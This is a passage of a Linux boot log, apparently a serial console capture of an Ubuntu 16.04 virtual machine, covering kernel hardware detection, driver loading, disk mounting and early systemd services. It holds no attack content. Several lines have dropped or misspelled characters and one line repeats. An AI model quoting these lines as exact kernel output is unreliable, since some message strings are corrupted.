0x00000000fffc0000-0x00000000ffffffff] reserved -[ 0.000000] NX (Execute Disable) protection: active -[ 0.000000] SMBIOS 2.5 present. -[ 0.000000] Hypervisor detected: KVM -[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 -[ 0.00000] MTRR: Disabled -[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. -[ 0.000000] CPU MTRRs all blank - virtualized system. -[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC -[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] -[ 0.000000] Scanning 1 areas for low memory corruption -[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] -[ 0.000000] ACPI: Early table checksum verification disabled -[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) -[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) -[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) -[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) -[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) -[ 0.000000] No NUMA configuration found -[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] -[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] -[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 -[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock -[ 0.000000] kvm-clock: using sched offset of 3577766287 cycles -[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns -[ 0.000000] Zone ranges: -[ 0.000000] DMA [mem 0x00000000001000-0x0000000000ffffff] -[ 0.000000] DMA32 [em 0x0000000001000000-0x000000003ffeffff] -[ 0.000000] Normal empty -[ 0.000000] Device empty -[ 0.000000] Movable zone start for each node -[ 000000] Early memory node ranges -[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] -[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] -[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] -[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 -[ 0.000000]OAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 -[ 0.000000] ACPI: INTSRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) -[ 0.000000] ACPI: INT_SRCVR (bus 0 bus_irq 9 global_irq 9 low level) -[ 0.000000] Using ACPI (MADT) for SMP configuration information -[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs -[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] -[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] -[ 0.000000] PM: Reistered nosave memor: [mem 0x000a0000-0x000effff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] -[ 0.000000] e820: [mem 0x40000000-0xfebfffff] avilable for PCIdevices -[ 0.000000] Booting paavirtualized kernel on KVM -[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns -[ 0.000000] setup_percpu: R_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 -[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 -[ 0.000000] Built 1 zonelists in Node order, mobilty grouping on. Total pages: 257912 -[ 0.000000] Policy zone: DMA32 -[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) -[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) -[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 -[ 0.000000] Kernel/User page tables isolation: enabled -[ 0.000000] Hierarchical RCU implementation. -[ 0000000] Build-time adjustment of leaf fanout to 64. -[ 0.000000] RCU restrictig CPUs from NR_CPUS=512 to nr_cpu_ids=2. -[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 -[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 -[ 0.000000] Console: colour VGA+ 80x25 -[ 0.000000] console [tty1] enabled -[ 0.000000] console [ttyS0] enabled -[ 0.000000] tsc: Detected 2207.998 MHz processor -[ 1.584822] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) -[ 1.631327] pid_max: default: 32768 minimum: 301 -[ 1.655585] ACPI: Core revision 20150930 -[ 1.676263] ACPI: 2 ACPI AML tables successfully acquired and loaded -[ 1.753855] Security Framework initialized -[ 1.808111] Yama: becoming mindful. -[ 1.823958] AppArmor: AppArmor initialized -[ 1.830115] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) -[ 1.846517] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) -[ 1.868486] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.885296] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 1.892428] Initializing cgroup subsys io -[ 1.907946] Initializing cgroup subsys memory -[ 1.912181] Initializing cgroup subsys devices -[ 1.914280] Initializing cgroup subsys freezer -[ 1.917778] Initializing cgroup subsys net_cls -[ 1.920083] Initializing cgroup subsys perf_event -[ 1.922279] Initializing cgroup subsys net_prio -[ 1.924490] Initializing cgroup subsys hugetlb -[ 1.926773] Initializing cgroup subsys pids -[ 1.942378] mce: CPU supports 0 MCE banks -[ 1.944188] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 -[ 1.946430] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 -[ 1.949058] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization -[ 1.953092] Spectre V2 : Mitigation: Full generic retpoline -[ 1.955578] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch -[ 1.960200] Speculative Store Bypass: Vulnerable -[ 1.962680] SRBDS: Unknown: Dependent on hypervisor status -[ 1.965251] MDS: Mitigation: Clear CPU buffers -[ 1.970315] Freeing SMP alternatives memory: 36K -[ 1.979201] ftrace: allocating 32339 entries in 127 pages -[ 2.088483] smpboot: APIC(0) Converting physical 0 to logical package 0 -[ 2.106057] smpboot: Max logical packages: 1 -[ 2.109399] x2apic enabled -[ 2.125488] Switched APIC routing to physical x2apic. -[ 2.141318] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 -[ 2.254831] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) -[ 2.271753] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. -[ 2.306489] KVM setup paravirtual spinlock -[ 2.330041] x86: Booting SMP configuration: -[ 2.347325] .... node #0, CPUs: #1 -[ 2.359503] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock -[ 2.404300] mce: CPU supports 0 MCE banks -[ 2.410177] x86: Booted up 1 node, 2 CPUs -[ 2.413184] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) -[ 2.418835] devtmpfs: initialized -[ 2.423918] evm: security.selinux -[ 2.427736] evm: security.SMACK64 -[ 2.440920] evm: security.SMACK64EXEC -[ 2.443187] evm: security.SMACK64TRANSMUTE -[ 2.451368] evm: security.SMACK64MMAP -[ 2.463561] evm: security.ima -[ 2.491699] evm: security.capability -[ 2.521294] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns -[ 2.549809] futex hash table entries: 512 (order: 3, 32768 bytes) -[ 2.563744] pinctrl core: initialized pinctrl subsystem -[ 2.571711] RTC time: 22:38:13, date: 01/25/21 -[ 2.580323] NET: Registered protocol family 16 -[ 2.642487] cpuidle: using governor ladder -[ 2.654477] cpuidle: using governor menu -[ 2.660730] PCCT header not found. -[ 2.661679] ACPI: bus type PCI registered -[ 2.679166] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 -[ 2.710268] PCI: Using configuration type 1 for base access -[ 2.724923] ACPI: Added _OSI(Module Device) -[ 2.734823] ACPI: Added _OSI(Processor Device) -[ 2.737903] ACPI: Added _OSI(3.0 _SCP Extensions) -[ 2.742608] ACPI: Added _OSI(Processor Aggregator Device) -[ 2.745984] ACPI: Executed 1 blocks of module-level executable AML code -[ 2.754306] ACPI: Interpreter enabled -[ 2.757992] ACPI: (supports S0 S5) -[ 2.761176] ACPI: Using IOAPIC for interrupt routing -[ 2.765378] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug -[ 2.799602] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) -[ 2.808008] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] -[ 2.814535] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] -[ 2.822878] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. -[ 2.832705] PCI host bridge to bus 0000:00 -[ 2.835924] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] -[ 2.841196] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] -[ 2.843137] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] -[ 2.844936] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] -[ 2.852070] pci_bus 0000:00: root bus resource [bus 00-ff] -[ 2.860417] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] -[ 2.867356] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] -[ 2.870972] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] -[ 2.902386] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] -[ 2.945070] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI -[ 2.948408] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB -[ 2.973696] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) -[ 2.976588] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) -[ 2.982185] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) -[ 2.987576] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) -[ 2.992953] ACPI: Enabled 2 GPEs in block 00 to 07 -[ 2.995289] vgaarb: setting as boot device: PCI:0000:00:02.0 -[ 2.998992] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none -[ 3.004146] vgaarb: loaded -[ 3.007135] vgaarb: bridge control possible 0000:00:02.0 -[ 3.011388] SCSI subsystem initialized -[ 3.018637] ACPI: bus type USB registered -[ 3.021818] usbcore: registered new interface driver usbfs -[ 3.025422] usbcore: registered new interface driver hub -[ 3.029793] usbcore: registered new device driver usb -[ 3.039308] PCI: Using ACPI for IRQ routing -[ 3.040724] NetLabel: Initializing -[ 3.041664] NetLabel: domain hash size = 128 -[ 3.042697] NetLabel: protocols = UNLABELED CIPSOv4 -[ 3.047577] NetLabel: unlabeled traffic allowed by default -[ 3.049513] amd_nb: Cannot enumerate AMD northbridges -[ 3.082536] clocksource: Switched to clocksource kvm-clock -[ 3.103717] AppArmor: AppArmor Filesystem Enabled -[ 3.104917] pnp: PnP ACPI init -[ 3.106440] pnp: PnP ACPI: found 3 devices - -[ 3.173033] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns -[ 3.175543] NET: Registered protocol family 2 -[ 3.180971] TCP established hash table entries: 8192 (order: 4, 65536 bytes) -[ 3.190229] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) -[ 3.196749] TCP: Hash tables configured (established 8192 bind 8192) -[ 3.200555] UDP hash table entries: 512 (order: 2, 16384 bytes) -[ 3.204791] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) -[ 3.210203] NET: Registered protocol family 1 -[ 3.211324] pci 0000:00:00.0: Limiting direct PCI/PCI transfers -[ 3.212750] pci 0000:00:01.0: Activating ISA DMA hang workarounds -[ 3.218025] Unpacking initramfs... -[ 3.720923] Freeing initrd memory: 14880K -[ 3.722708] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns -[ 3.728510] platform rtc_cmos: registered platform RTC device (no PNP device found) -[ 3.732202] Scanning for low memory corruption every 60 seconds -[ 3.746818] audit: initializing netlink subsys (disabled) -[ 3.749003] audit: type=2000 audit(1611614297.048:1): initialized -[ 3.751938] Initialise system trusted keyring -[ 3.754336] HugeTLB registered 2 MB page size, pre-allocated 0 pages -[ 3.758943] zbud: loaded -[ 3.760892] VFS: Disk quotas dquot_6.6.0 -[ 3.763098] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) -[ 3.766533] squashfs: version 4.0 (2009/01/31) Phillip Lougher -[ 3.769469] fuse init (API version 7.23) -[ 3.771387] Key type big_key registered -[ 3.773320] Allocating IMA MOK and blacklist keyrings. -[ 3.802211] Key type asymmetric registered -[ 3.803966] Asymmetric key parser 'x509' registered -[ 3.805980] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) -[ 3.809309] io scheduler noop registered -[ 3.811018] io scheduler deadline registered (default) -[ 3.813210] io scheduler cfq registered -[ 3.815041] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 -[ 3.817546] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 -[ 3.820411] ACPI: AC Adapter [AC] (on-line) -[ 3.822362] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 -[ 3.825505] ACPI: Power Button [PWRF] -[ 3.827196] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 -[ 3.830473] ACPI: Sleep Button [SLPF] -[ 3.837924] ACPI: Battery Slot [BAT0] (battery present) -[ 3.839991] GHES: HEST is not enabled! -[ 3.841729] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled -[ 3.877948] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A -[ 3.886569] Linux agpgart interface v0.103 -[ 3.895752] loop: module loaded -[ 3.897981] scsi host0: ata_piix -[ 3.900123] scsi host1: ata_piix -[ 3.905270] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 -[ 3.913286] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 -[ 3.920230] libphy: Fixed MDIO Bus: probed -[ 3.922781] tun: Universal TUN/TAP device driver, 1.6 -[ 3.924879] tun: (C) 1999-2004 Max Krasnyansky -[ 3.927112] PPP generic driver version 2.4.2 -[ 3.929588] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver -[ 3.935229] ehci-pci: EHCI PCI platform driver -[ 3.938561] ehci-platform: EHCI generic platform driver -[ 3.941645] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver -[ 3.946434] ohci-pci: OHCI PCI platform driver -[ 3.949379] ohci-platform: OHCI generic platform driver -[ 3.956472] uhci_hcd: USB Universal Host Controller Interface driver -[ 3.959140] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 -[ 3.967060] serio: i8042 KBD port at 0x60,0x64 irq 1 -[ 3.975868] serio: i8042 AUX port at 0x60,0x64 irq 12 -[ 3.984044] mousedev: PS/2 mouse device common for all mice -[ 3.990653] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 -[ 3.996769] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 -[ 3.996830] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram -[ 3.996837] i2c /dev entries driver -[ 3.996895] device-mapper: uevent: version 1.0.3 -[ 3.996951] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com -[ 3.996967] ledtrig-cpu: registered to indicate activity on CPUs -[ 3.997258] NET: Registered protocol family 10 -[ 3.997442] NET: Registered protocol family 17 -[ 3.997455] Key type dns_resolver registered -[ 3.997689] registered taskstats version 1 -[ 3.997706] Loading compiled-in X.509 certificates -[ 3.998388] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' -[ 3.998403] zswap: loaded using pool lzo/zbud -[ 4.002781] Key type trusted registered -[ 4.005743] Key type encrypted registered -[ 4.005750] AppArmor: AppArmor sha1 policy hashing enabled -[ 4.005752] ima: No TPM chip found, activating TPM-bypass! -[ 4.005761] ima: Allocated hash algorithm: sha1 -[ 4.005773] evm: HMAC attrs: 0x1 -[ 4.006145] Magic number: 5:763:654 -[ 4.008225] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:14 UTC (1611614294) -[ 4.008310] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found -[ 4.008311] EDD information not available. -[ 4.117278] Freeing unused kernel memory: 1492K -[ 4.132547] Write protecting the kernel read-only data: 14336k -[ 4.144508] Freeing unused kernel memory: 1592K -[ 4.147955] Freeing unused kernel memory: 56K -Loading, please wait... -starting version 229 -[ 4.192923] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.193424] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.193508] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.193530] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.193553] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.232994] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.260680] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.269690] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.269753] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.269919] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.449033] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI -[ 4.450585] e1000: Copyright (c) 1999-2006 Intel Corporation. -[ 4.455982] Fusion MPT base driver 3.04.20 -[ 4.467534] Copyright (c) 1999-2008 LSI Corporation -[ 4.506360] Fusion MPT SPI Host driver 3.04.20 -[ 4.612452] AVX2 version of gcm_enc/dec engaged. -[ 4.617266] AES CTR mode by8 optimization enabled -[ 4.695399] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 -[ 5.142304] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff -[ 5.177787] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection -[ 5.268666] mptbase: ioc0: Initiating bringup -[ 5.339349] ioc0: LSI53C1030 A0: Capabilities={Initiator} -[ 5.522282] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 -[ 5.641602] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 5.643392] scsi target2:0:0: Beginning Domain Validation -[ 5.645891] scsi target2:0:0: Domain Validation skipping write tests -[ 5.649957] scsi target2:0:0: Ending Domain Validation -[ 5.653068] scsi target2:0:0: asynchronous -[ 5.656817] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 5.659560] scsi target2:0:1: Beginning Domain Validation -[ 5.676217] scsi target2:0:1: Domain Validation skipping write tests -[ 5.688063] scsi target2:0:1: Ending Domain Validation -[ 5.698092] scsi target2:0:1: asynchronous -[ 5.762012] sd 2:0:0:0: Attached scsi generic sg0 type 0 -[ 5.776120] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) -[ 5.787037] sd 2:0:1:0: Attached scsi generic sg1 type 0 -[ 5.821949] sd 2:0:0:0: [sda] Write Protect is off -[ 5.834208] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) -[ 5.849173] sd 2:0:0:0: [sda] Incomplete mode parameter data -[ 5.869988] sd 2:0:0:0: [sda] Assuming drive cache: write through -[ 5.872020] sd 2:0:1:0: [sdb] Write Protect is off -[ 5.880224] sd 2:0:1:0: [sdb] Incomplete mode parameter data -[ 5.897844] sd 2:0:1:0: [sdb] Assuming drive cache: write through -[ 5.917396] sda: sda1 -[ 5.929228] sd 2:0:0:0: [sda] Attached SCSI disk -[ 5.957652] sd 2:0:1:0: [sdb] Attached SCSI disk -[ 6.448451] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:4e:d5:19 -[ 6.459835] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection -[ 7.163610] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:25:02:6b -[ 7.171557] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection -[ 7.706828] e1000 0000:00:0a.0 eth3: (PCI:33MHz:32-bit) 08:00:27:80:81:f6 -[ 7.709705] e1000 0000:00:0a.0 eth3: Intel(R) PRO/1000 Network Connection -[ 7.719303] e1000 0000:00:08.0 enp0s8: renamed from eth1 -[ 7.736823] e1000 0000:00:09.0 enp0s9: renamed from eth2 -[ 7.764808] e1000 0000:00:0a.0 enp0s10: renamed from eth3 -[ 7.804805] e1000 0000:00:03.0 enp0s3: renamed from eth0 -Begin: Loading essential drivers ... [ 9.168889] md: linear personality registered for level -1 -[ 9.173824] md: multipath personality registered for level -4 -[ 9.192823] md: raid0 personality registered for level 0 -[ 9.214455] md: raid1 personality registered for level 1 -[ 9.293233] raid6: sse2x1 gen() 10708 MB/s -[ 9.362777] raid6: sse2x1 xor() 5662 MB/s -[ 9.512586] raid6: sse2x2 gen() 8328 MB/s -[ 9.588585] raid6: sse2x2 xor() 5519 MB/s -[ 9.656900] raid6: sse2x4 gen() 8367 MB/s -[ 9.725014] raid6: sse2x4 xor() 5385 MB/s -[ 9.793901] raid6: avx2x1 gen() 8550 MB/s -[ 9.863534] raid6: avx2x2 gen() 5033 MB/s -[ 9.936521] raid6: avx2x4 gen() 6470 MB/s -[ 9.938378] raid6: using algorithm sse2x1 gen() 10708 MB/s -[ 9.940358] raid6: .... xor() 5662 MB/s, rmw enabled -[ 9.942239] raid6: using avx2x2 recovery algorithm -[ 9.945112] xor: automatically using best checksumming function: -[ 9.985261] avx : 18756.000 MB/sec -[ 9.988280] async_tx: api initialized (async) -[ 10.066783] md: raid6 personality registered for level 6 -[ 10.069978] md: raid5 personality registered for level 5 -[ 10.072320] md: raid4 personality registered for level 4 -[ 10.105740] md: raid10 personality registered for level 10 -done. -Begin: Running /scripts/init-premount ... done. -Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. -Begin: Running /scripts/local-premount ... [ 10.152193] Btrfs loaded -Scanning for Btrfs filesystems -done. -Warning: fsck not present, so skipping root file system -[ 10.243624] EXT4-fs (sda1): INFO: recovery required on readonly filesystem -[ 10.250520] EXT4-fs (sda1): write access will be enabled during recovery -[ 10.351171] EXT4-fs (sda1): orphan cleanup on readonly fs -[ 10.358590] EXT4-fs (sda1): 1 orphan inode deleted -[ 10.727057] EXT4-fs (sda1): recovery complete -[ 10.733945] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) -done. -Begin: Running /scripts/local-bottom ... done. -Begin: Running /scripts/init-bottom ... done. -[ 10.944376] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) -[ 10.982777] systemd[1]: Detected virtualization oracle. -[ 10.995335] systemd[1]: Detected architecture x86-64. - -Welcome to Ubuntu 16.04.7 LTS! - -[ 11.033545] systemd[1]: Set hostname to . -[ 11.213000] random: nonblocking pool is initialized -[ 11.309342] systemd[1]: Listening on udev Control Socket. -[ OK ] Listening on udev Control Socket. -[ 11.322110] systemd[1]: Started Forward Password Requests to Wall Directory Watch. -[ OK ] Started Forward Password Requests to Wall Directory Watch. -[ 11.339172] systemd[1]: Reached target Swap. -[ OK ] Reached target Swap. -[ 11.343197] systemd[1]: Created slice System Slice. -[ OK ] Created slice System Slice. -[ 11.347346] systemd[1]: Created slice system-serial\x2dgetty.slice. -[ OK ] Created slice system-serial\x2dgetty.slice. -[ 11.354381] systemd[1]: Listening on Syslog Socket. -[ OK ] Listening on Syslog Socket. -[ 11.369488] systemd[1]: Started Trigger resolvconf update for networkd DNS. -[ OK ] Started Trigger resolvconf update for networkd DNS. -[ 11.450586] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. -[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. -[ 11.471023] systemd[1]: Listening on LVM2 metadata daemon socket. -[ OK ] Listening on LVM2 metadata daemon socket. -[ 11.480659] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. -[ OK ] Listening on /dev/initctl Compatibility Named Pipe. -[ 11.490986] systemd[1]: Reached target Encrypted Volumes. -[ OK ] Reached target Encrypted Volumes. -[ 11.556834] systemd[1]: Listening on Device-mapper event daemon FIFOs. -[ OK ] Listening on Device-mapper event daemon FIFOs. -[ 11.594147] systemd[1]: Listening on Journal Socket (/dev/log). -[ OK ] Listening on Journal Socket (/dev/log). -[ 11.604795] systemd[1]: Listening on Journal Audit Socket. -[ OK ] Listening on Journal Audit Socket. -[ 11.652694] systemd[1]: Reached target System Time Synchronized. -[ OK ] Reached target System Time Synchronized. -[ 11.666228] systemd[1]: Listening on Journal Socket. -[ OK ] Listening on Journal Socket. -[ 11.704700] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... - Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... -[ 11.724891] systemd[1]: Mounting POSIX Message Queue File System... - Mounting POSIX Message Queue File System... -[ 11.750989] systemd[1]: Starting Create list of required static device nodes for the current kernel... - Starting Create list of required st... nodes for the current kernel... -[ 11.765392] systemd[1]: Starting Uncomplicated firewall... - Starting Uncomplicated firewall... -[ 11.784347] systemd[1]: Mounting Debug File System... - Mounting Debug File System... -[ 11.812995] systemd[1]: Starting Remount Root and Kernel File Systems... -[ 11.820113] EXT4-fs (sda1): re-mounted. Opts: (null) - Starting Remount Root and Kernel File Systems... -[ 11.832766] systemd[1]: Starting Nameserver information manager... - Starting Nameserver information manager... -[ 11.843870] systemd[1]: Starting Set console keymap... - Starting Set console keymap... -[ 11.861658] systemd[1]: Starting Load Kernel Modules... - Starting Load Kernel Modules... -[ 11.872213] systemd[1]: Mounting Huge Pages File System... - Mounting Huge Pages File System... -[ 11.887348] systemd[1]: Listening on udev Kernel Socket. -[ OK ] Listening on udev Kernel Socket. -[ 11.899399] systemd[1]: Listening on LVM2 poll daemon socket. -[ OK ] Listening on LVM2 poll daemon socket. -[ 11.930817] Loading iSCSI transport class v2.0-870. -[ 11.940786] systemd[1]: Starting Journal Service... - Starting Journal Service... -[ 11.949474] systemd[1]: Reached target User and Group Name Lookups. -[ OK ] Reached target User and Group Name Lookups. -[ 11.963020] systemd[1]: Created slice User and Session Slice. -[ OK ] Created slice User and Session Slice. -[ 11.980758] systemd[1]: Reached target Slices. -[ OK ] Reached target Slices. -[ 11.991356] iscsi: registered transport (tcp) -[ 12.013649] systemd[1]: Mounted Debug File System. -[ OK ] Mounted Debug File System. -[ 12.023500] systemd[1]: Mounted Huge Pages File System. -[ OK ] Mounted Huge Pages File System. -[ 12.039462] systemd[1]: Mounted POSIX Message Queue File System. -[ OK ] Mounted POSIX Message Queue File System. -[ 12.051910] systemd[1]: Started Create list of required static device nodes for the current kernel. -[ OK ] Started Create list of required sta...ce nodes for the current kernel. -[ 12.118597] systemd[1]: Started Uncomplicated firewall. -[ OK ] Started Uncomplicated firewall. -[ 12.172155] systemd[1]: Started Remount Root and Kernel File Systems. -[ OK ] Started Remount Root and Kernel File Systems. -[ 12.209433] systemd[1]: Started Set console keymap. -[ OK ] Started Set console keymap. -[ 12.231561] systemd[1]: Started Nameserver information manager. -[ OK ] Started Nameserver information manager. -[ 12.256937] iscsi: registered transport (iser) -[ 12.257574] systemd[1]: Started Journal Service. -[ OK ] Started Journal Service. -[ OK ] Started Load Kernel Modules. -[ OK ] Started LVM2 metadata daemon. - Mounting FUSE Control File System... - Starting Apply Kernel Variables... - Starting udev Coldplug all Devices... - Starting Flush Journal to Persistent Storage... - Starting Load/Save Random Seed... - Starting Create Static Device Nodes in /dev... -[ OK ] Mounted FUSE Control File System. -[ OK ] Started Apply Kernel Variables. -[ OK ] Started 